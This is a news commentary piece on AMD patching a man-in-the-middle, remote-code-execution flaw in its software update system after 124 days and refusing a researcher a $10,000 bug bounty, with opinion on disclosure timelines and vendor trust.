AMD has closed a software-update vulnerability after 124 days, but the researcher who found it says the company refused to pay a $10,000 bug bounty even though he followed the disclosure process and cooperated with the fix. The case is a tidy little example of how security programs can look generous on paper and stingy in practice.
The flaw was found in February inside AMD’s software update system. According to the researcher, Paul, it could have enabled a man-in-the-middle attack and remote code execution. AMD asked him to take down a blog post about the issue, promised a CVE, and said it would fix the software and credit him – but made clear from the start that payment was off the table because its policy does not cover man-in-the-middle attacks.
Why the AMD software-update fix took 124 days
What slowed matters down was not the patch itself so much as the process around it. Paul says AMD first suggested a longer-than-standard embargo because the issue may have touched more than Ryzen Master, then later asked for more time again, citing multiple tools and customer requests to extend the deadline until after updates shipped. Standard disclosure windows are usually closer to 90 days, so the company’s timeline already looked stretched before the fix landed.
AMD ultimately pushed out an update on June 9. Paul says the new version now downloads drivers in a safer way, which is exactly the sort of boring sentence security teams love to write after a crisis. He also pointed out that file verification still relies on CRC32, an older hash approach that is not considered cryptographically secure.
The awkward part of the disclosure
There is a second layer to the story, and it is the kind vendors hate because it makes the whole thing look clumsy. One Reddit user claimed the vulnerable code path would not actually have been reachable, because the relevant fragment was never called in the first place. If that is correct, AMD spent months untangling an update system that could not update itself without manual installation – a neat illustration of how patch chains can fail in very ordinary ways.
That does not excuse the refusal to pay, of course. Big bug-bounty programs increasingly reward anything that touches authentication, update mechanisms, or code execution because the industry has learned the hard way that those are the attack paths worth paying for. AMD’s stance may fit the letter of its policy, but it does little for trust when the researcher did the work, the company got the fix, and the wallet stayed shut.
What researchers will notice next
The practical question now is whether AMD’s handling of this case discourages the kind of early reporting it needs most. Researchers talk to one another, and a reputation for denying edge-case claims can quickly become a reputation for making disclosure a chore. The patch is out, but the bigger lesson is simpler: if a vendor wants outsiders to keep finding holes in its software, it should not act surprised when they also ask to get paid.